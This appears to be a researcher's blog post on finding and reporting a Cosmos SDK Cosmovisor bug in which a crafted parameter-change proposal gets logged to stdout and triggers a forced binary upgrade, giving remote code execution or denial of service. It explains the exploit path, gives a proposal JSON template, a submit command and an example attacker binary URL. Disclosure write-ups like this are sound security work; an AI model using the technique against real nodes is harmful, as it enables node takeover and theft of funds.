10/11/2023
Imagine, you're hunting for bugs in a project. You're reading through the documentation of a widely used framework with millions of dollars at stake. Then, you stumble across this:
Cosmovisor is small process manager for Cosmos SDK application binaries that monitors stdout for incoming chain upgrade proposals. If it sees a proposal that gets approved, cosmovisor can automatically download the new binary, ..., switch from the old binary to the new one, and finally restart the node with the new binary.
Wait, what? It looks like the watchdog program scans through stdout
to determine if an update has occurred. If that's true, then this is completely insane! All you would have to do is find a way to write to stdout
and the process manager would update your binary. Is this real?
This was the position we were in: a horrible design flaw staring us in the face. While Nathan and I were reviewing the Cosmos SDK, this documentation caught my eye. And there was no going back. Both of us had been here before though. Most of the time, these "obvious" issues turn into sad and unfruitful dead ends. But this time, for once, it was real. Our deep dive into the codebase, and all our time chasing down all those loose ends, had finally paid off. I want you to join us on our journey through the high of discovering, exploiting, and reporting this bug.
For those outside of the blockchain space, this is an interesting application security issue that requires no blockchain-specific knowledge. For those in web3, this is a fascinating wake up call that not all bugs are in smart contracts; they can be within the infrastructure of the blockchain too. Enjoy! :)
Ethereum allows for the execution of arbitrary code on the blockchain. However, as the first of its kind, it has several drawbacks:
What's the solution to these problems? Create something that is faster, cheaper and allows for customization as well as interoperability between other blockchains. The Cosmos SDK is a blockchain development framework that perfectly meets all of these criteria to make application-specific blockchains. Application-specific blockchains are services made for a specific project, allowing more control over the ecosystem for the developers and users.
For instance, instead of having a trading platform as a smart contract on Ethereum, a project can create their own blockchain that natively runs all the required code for the trading platform. This allows for the developer to customize various low level features of the blockchain, such as gas costs, node settings and more. Additionally, the Cosmos SDK has Inter-Blockchain Communication (IBC) as a central feature, which allows for developers to communicate with other Cosmos blockchains by default to transfer funds or other operations.
Cosmos comes with various modules that developers can pick and choose from depending on their needs. Each of these modules provides some sort of additional capability for the blockchain, and the plug and play nature of them makes building the blockchain significantly faster. For instance, there is a bank
module for handling ownership over tokens and a governance
module for voting on changes to the blockchain.
A node is an individual instance of a blockchain running within the network. Cosmovisor
helps manage the node as a watchdog program. It keeps track of the logs, performs upgrades and allows for easy starting and syncing of additional nodes for the blockchain. An image of the node running is shown above in Figure 1.
When an upgrade is required, a user proposes an update via the governance
module, which everyone votes on. If the proposal gets enough votes from the other users, then at a specific block (point in time) the blockchain will get updated with this new information. From fine-tuning parameters to changing the code of the chain itself, this is a general purpose method for updating the blockchain in a decentralized fashion.
If a proposal is approved and includes an update to the chain, the governance
module will output a string to stdout
. The Cosmovisor software will download the new binary, as specified by stdout
, and restart itself using this new application. The automatic download and upgrade is awesome for keeping the blockchain up-to-date, but it would be horrifying if a single user could force an upgrade. Remember this for later!
Since Cosmovisor functions as a wrapper or watchdog method around the Cosmos blockchain binary, most of the configurations are controlled with environment variables . A few important ones are listed below:
DAEMON_NAME
: The name of the binary of the blockchain that is being executed.DAEMON_ALLOW_DOWNLOAD_BINARIES
: Allow Cosmovisor to download the new application binary and replace the current one. Defaults to false
but many projects have instructions to turn this on.DAEMON_RESTART_AFTER_UPGRADE
: If an upgrade occurs (either manually or via the feature above), restart the application automatically. This defaults to true
.While reading through the code, Nathan found the regex responsible for parsing the upgrade information:
".*"
: The name of the upgrade itself. The cosmovisor will create a folder for the new upgrade with this name.(height)(\d+)
: The block number in which the blockchain should be updated. All systems need to be updated at the same time in order to keep the blockchain running smoothly.(\S+)):\s+(\S*)
: Upgrade JSON. This has various fields for determining how to perform the upgrade and looks extremely juicy for potential exploitation. Below are two of the important fields:
linux/amd64
.https://maxwelldulin.com/hacker.sh
.When testing ideas, it's important to "fail fast". I try to find the fastest and laziest way that I can test out theories. If I'm being generous, 1 out of 1000 big ideas work for me. This is done in order to save time on bad rabbit holes. To me, building out a full Cosmos SDK blockchain with Cosmovisor would likely result in time wasted. So, how do we test this fast?
My buddy Zach Minneker enlightened me to use the tests of projects when doing binary fuzzing. Why not use tests here as well? Tests usually have examples of happy paths for getting functionality working. Additionally, the projects usually develop wrappers for testing functionality without having many external dependencies for setup, allowing for the isolation of specific code. In this case, Cosmovisor has an in-depth set of tests that are easy to run and modify for our own needs. Playing with these was incredibly useful for understanding how the update process functions.
The test suite used files as input for stdout/stderr. We copied an existing test for the upgrade functionality and created a file with our payload. To our surprise, this magically worked! The injected string in the test file triggers the update. This is absolute madness.
The test framework was quite fruitful for our initial testing. From modifying the code and running tests, we were convinced that a bad string would be able to trigger the Cosmovisor update functionality. However, we needed to reproduce this within a real blockchain. This is because there may exist functionality preventing this attack from working that we did not fully understand, or simply didn’t see during our code analysis. So, we looked for a blockchain running a vulnerable version of Cosmovisor, and ended up setting up a Desmos node for testing, mostly because they have great documentation.
Like before, we want to "fail fast". Instead of trying to find a way to print an arbitrary string (aka print sink), we compiled our own print statement into easy-to-hit functionality. We called the added code to trigger the print statement and Cosmovisor saw the update and processed it!
Seeing the call to fmt.Println(...)
perform the update was surreal. This is when the idea became reality. Reading the documentation, running the tests and setting up the test environment was 100% worth it! Now, let's find a real print sink to trigger this vulnerability on a real project.
Sometimes, trying to pwn an application requires gaining super esoteric knowledge. Don't be afraid to enter these murky waters when granted strange primitives. Take the time to really understand what you're working with. In the case of Qualys, they could load and unload DLLs but nothing else but were still able to get code execution.
To exploit this, we are going to become experts on how the Cosmos SDK logs data and what it logs. This is a great example of the requirement of learning extremely niche stuff in order to exploit a vulnerability. To our surprise, this took days upon days of reading code in order to exploit because of unexpected functionality of the Cosmos SDK logging. I will not bore you with the description of how we got there; I'll simply explain how it works below. Just know, this took lots of trial and error to come to.
The Cosmos SDK uses the logger from Tendermint, the consensus and networking layer of Cosmos. The logger utilizes conditional logic for when to output to stdout/stderr depending on the verbosity setting. The node operator specifies the log verbosity of the application binary at startup.
Depending on the type of output the developer of the module wants to give, different functions are called. There are three: Error()
, Info()
(default visibility) and Debug()
. Using these functions and the requested visibility of the logs, the data will be outputted accordingly. The tiered logging setup is common within large projects such as this one.
The function used for logging requires a single parameter but can accept more, The first parameter is a string to be outputted describes the logs and the data to come. After this, a developer can provide multiple key
and value
pairs that will be outputted. The output looks like this: LogString key1=value1, key2=value2
. An example of this can be seen in Figure 3 for both the code being executed (left) and the log output (right).
The key=value
within the string is quote escaped. What does this mean? The logger will turn "
into \"
whenever we output a double quote to the logs. Does this matter? Immensely! This was a huge set back for us because this breaks the regex parsing mentioned above in Figure 2. The quote escaping was the real reason we got stuck for this attack.
From many hours of reviewing the logger code and dynamic testing, we understood the limitations of the system. So, what can we do? What types of sinks should we look for in the code?
After a week of work, Nathan and I read through the Cosmos SDK four times each and had downloaded various projects using the SDK to see if they had issues. Eventually, we started looking for usages of sprintf()
within the beginning parameter of the logger function.
Sometimes, going through the same code with new knowledge allows us to see new issues compared to before. I commonly find bugs on a third or fourth pass through a codebase since code from one place may help me understand code in another location. After a week of searching and at the very end of night seven, we found the param module with this beautiful sink:
The code in Figure 4 is for proposing a new param
change within the Cosmos SDK. The parameters provided could be an arbitrary key and an arbitrary value. According to our specifications, the sink was the initial string of the logger and was using %s
within a format string for sprintf()
, which is not quote escaped. With these specifications, we should be able to put double quotes inside of here and create valid JSON! To make matters better, there is no input validation prior to this within the Cosmos SDK; we can provide literally any string for these, making it the perfect sink.
Could this situation get better? Yes! The code path (param
module) is available in every blockchain using the Cosmos SDK. Second, the code utilizes the .Info()
function, which is the default visibility of the logger. Finally, it does not require any crazy setup, circumstances or special authorization. We can call a single function from the Cosmos SDK CLI in order to hit this code. All of this together means that a single call to any Cosmos blockchain could result in get code execution or knock the node offline.
All that is required is to make a single call to the Cosmos blockchain via the CLI. Depending on the version of the SDK, param
will either be its own module or be under governance
. For our own testing, we chose to use Desmos
, since we had a working node already installed on the system which uses gov
. NOTE: This is not a flaw in Desmos specifically.
The parameter change proposal is a JSON file when used from the CLI. The sink is within this proposal JSON data. Below is an example of valid JSON, with <payload_here>
as filler for our attack data:
{ "title": "TitleDK", "description": "DescDK", "changes": [ { "key": "PwnMe", "value": "PAYLOAD HERE", "subspace": "bank" } ], "address": "desmos1jtu..." }The payload for
value
field is below. I removed this from the JSON above because it is really messy. It should be noted that since the string is within the JSON the payload needs to be quote escaped here (\"
instead of "
).
How does this sink payload work? Remember the regex from above? Our goal is to match this perfectly within either the key
or value
proposal field. The fields within the payload, as seen in Figure 5, are shown below:
binaries
field. In this case, we were testing on a Linux system but it can be set up on others as well.value
. Below is the CLI call for sending the proposal to hit the print sink for Desmos. A similar call can be used for other projects though:
$ desmosd tx gov \ submit-legacy-proposal param-change \ proposal.json --from test_user
The call is simply executing the parameter change proposal from the CLI. The real magic comes from the proposal.json
file crafted above, which contains the string to force our upgrade.
What does this look like for real? Watch the proof of concept below. This goes from executing the command to getting RCE on the box.
If you want to follow along, there is a completely Dockerized proof of concept on my Github at mdulin2. This contains a demo environment that will automatically install a Cosmos SDK (Cronos, Desmos or Osmosis) and run the node. Then, within the docker container, there is a bash script with the environment configured that will run the exploit. Feel free to play around with the environment to get a better grasp at what is going on.
When the remote download flag is turned on, then this vulnerability results in remote code execution (RCE). A compromised validator could get all of its funds stolen. However, the worst case is that a malicious actor could have compromised all nodes in order to force the network to perform malicious actions, such as token transfers to themselves.
If the remote download flag is turned off, the vulnerability acts as a denial of service (DoS) bug. This is because when the update fails, the node does not reboot. Being able to take down a blockchain is catastrophic; it leads to a lack of trust in the system and does not allow actions to be performed by its users. Both of these attacks have horrifying consequences: either compromising nodes or taking the blockchain offline.
Fortunately (or unfortunately), the Cosmovisor documentation at the beginning of the article, was in an old version of the README.md. The bug only existed in the v0.1.0 version of the tool. However, it existed in the Cosmos-SDK main branch until version 46.0 since the updated Cosmovisor was kept in a separate branch for whatever reason. So, who is really vulnerable?
Because of these requirements, we were unsure of just how many potential node operators across the Cosmoverse would be vulnerable to this attack, since it’s impossible to know which version of Cosmovisor is being run locally on a node. But the prevalence of forked, un-upgraded versions of the Cosmos SDK made us realize this was likely a non-trivial issue, and might affect more chains than we initially thought.
One question remained though: how was this already fixed in the newest versions of Cosmovisor? After some digging, we realized we had rediscovered a bug! A developer saw this as a potential issue and rewrote the tool to use files instead of stdout. Good on them for figuring this out! They mentioned this attack was theoretically possible but there was never any mention of an exploit path in the Github issue and no urgency regarding upgrades.
Honestly, we were just trying to understand the Cosmos SDK when we found this bug and one another one. Luckily for us, the Cosmos SDK has a bug bounty program.
Unluckily for us, the bug in this blog post was considered out of scope. Recently, they expanded the program to make these classes of vulnerabilities in scope but it was after I had reported this bug. I wonder if this report had anything to do with that? Anyway, this is an awesome step in the right direction for the Cosmos SDK team. With millions of dollars at stake, it should be the impact on the ecosystem that matters and not some scope document that does not cover every impact imaginable. As a result, they gave us a $1250 bonus for our work, which was super nice of them, especially considering this was a bug in older version of the Cosmos SDK, and it was unclear exactly what the scope of impact was.
We found another vulnerability within the Cosmos SDK as well. This bug was a simple role based authorization bug within the circuit module. Read the HackerOne report or the Github pull request to get more insight on this. This vulnerability netted us more than the bug in this post; $2K and a $500 bonus for a good report.
Overall, we took home 3.75K for two bugs in the Cosmos SDK. The team was really nice to work with and I'd be happy to report bugs to this program in the future. These were the first two bugs that I had reported via HackerOne and I had a good experience doing it. This also ended up with a disclosure on the Cosmos SDK forums, which was cool to see after all of this work. A screenshot of this is shown in Figure 7 of the disclosure.
From every finding and every project, there is always so much to learn. Whether it's a new thing or an old trick that just was particularly useful this time around, I always try to document a few takeaways.
For me, this was a major confidence boost. Finding a serious RCE/DoS bug and an access control vulnerability is a great start to our journey in the Cosmos world. Bug bounty programs reward those who obtain specialized knowledge and who are willing to go where other people are not.
Thanks for joining me in my understanding of a bug that Nathan Kirkland and I discovered in the Cosmos SDK. I hope you found this interesting and learned from the security discussions. Thanks to Max Arnold and Nathan Kirkland for reviewing the post and the Cosmos SDK team for disclosing and fixing the bugs. Feel free to reach out to me (contact information is in the footer) if you have any questions, comments about this article or anything else. Additionally, if you want an audit of your Cosmos project, feel free to reach out as well. Cheers from Maxwell "ꓘ" Dulin.